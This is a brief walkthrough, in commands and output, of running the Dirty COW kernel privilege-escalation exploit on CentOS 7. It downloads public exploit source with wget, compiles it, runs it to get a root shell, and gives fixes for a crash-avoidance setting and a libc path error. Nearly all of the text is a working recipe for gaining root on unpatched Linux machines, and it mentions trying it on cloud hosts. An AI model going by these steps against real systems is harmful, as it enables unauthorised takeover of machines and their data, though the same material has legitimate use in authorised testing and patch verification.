Dirtycow privilege escalation

Test environment

[centos@bogon ~]$ uname -a
Linux bogon 3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Download

[centos@bogon ~]$ wget https://gist.githubusercontent.com/scumjr/17d91f20f73157c722ba2aea702985d2/raw/a37178567ca7b816a5c6f891080770feca5c74d7/dirtycow-mem.c

Compile

The build prints a few warnings.

[centos@bogon ~]$ gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
dirtycow-mem.c: In function ‘get_range’:
dirtycow-mem.c:139:3: warning: use of assignment suppression and length modifier together in gnu_scanf format [-Wformat=]
sscanf(line, "%lx-%lx %s %*Lx %*x:%*x %*Lu %s", start, end, flags, filename);
^
dirtycow-mem.c:139:3: warning: use of assignment suppression and length modifier together in gnu_scanf format [-Wformat=]
[centos@bogon ~]$ ls
Desktop dirtycow-mem.c Downloads Pictures Templates
dirtycow-mem Documents Music Public Videos

Run

[centos@bogon ~]$ chmod 777 dirtycow-mem
[centos@bogon ~]$ ./dirtycow-mem
[*] range: 7ff3e2c78000-7ff3e2e2e000]
[*] getuid = 7ff3e2d362e0
[*] mmap 0x7ff3e2a75000
[*] exploiting (patch)
[*] patched (procselfmemThread)
[*] patched (madviseThread)
[root@bogon centos]# [*] exploiting (unpatch)
[*] unpatched: uid=1000 (procselfmemThread)
[*] unpatched: uid=1000 (madviseThread)
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
[root@bogon centos]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

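Remember to run the following command, otherwise the machine may die (on Alibaba Cloud it crashed outright; on Tencent Cloud it dropped back to the original shell).
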
echo 0 > /proc/sys/vm/dirty_writeback_centisecs

Error on CentOS 7

[centos@bogon ~]$ ./dirtycow-mem
[*] range: 7f3944286000-7f394443c000]
[*] getuid = 7f39443442e0
dirtycow-mem: open("/lib/x86_64-linux-gnu/libc.so.6"): No such file or directory

Edit dirtycow-mem.c and change this line:

#define LIBC_PATH   "/lib/x86_64-linux-gnu/libc.so.6"

to:

#define LIBC_PATH   "/usr/lib64/libc.so.6"